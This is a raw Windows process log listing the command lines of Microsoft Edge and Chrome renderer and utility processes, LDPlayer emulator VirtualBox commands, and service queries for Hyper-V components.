"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3632 /prefetch:1
C:\Program Files\ldplayer9box\vbox-img.exe
"C:\Program Files\ldplayer9box\vbox-img.exe" setuuid --filename "F:\LDPlayer\LDPlayer9\vms\leidian0\sdcard.vmdk" --uuid 20160302-dddd-dddd-54d7-000000000000
C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe
"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5024 /prefetch:1
C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe
"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config
C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe
"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config
C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe
"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config
C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe
"C:\Program Files\ldplayer9box\Ld9BoxHeadless.exe" --comment leidian0 --startvm 20160302-aaaa-aaaa-54d7-000000000000 --vrde config
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3932 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=3896 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5584 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5924 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Windows\SysWOW64\sc.exe
sc query HvHost
C:\Windows\SysWOW64\sc.exe
sc query vmms
C:\Windows\SysWOW64\sc.exe
sc query vmcompute
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4336 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=10384 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=8004 --field-trial-handle=1856,i,15983584053654417825,4692668678497886892,131072 /prefetch:8
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5788 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3896 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=5596 /prefetch:2
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6380 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6620 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5596 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3284 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7144 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6904 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6200 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5612 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6140 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3260 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2848 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7008 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7264 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5876 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5928 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=36 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7356 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7476 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7600 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=39 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8112 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=40 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8056 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8448 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8560 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=43 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8716 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=44 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8104 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8436 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6236 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8528 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=49 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6400 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5824 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=51 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6484 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=52 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8964 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=53 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7820 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=54 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=55 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8584 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8280 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=57 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8268 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=58 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8480 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=59 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9472 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=60 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7348 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7616 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=62 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5996 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=63 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7152 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8320 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=65 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6944 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=66 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7384 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9192 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2140,13210980290968165538,1784862910098140377,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=68 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9176 /prefetch:1
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
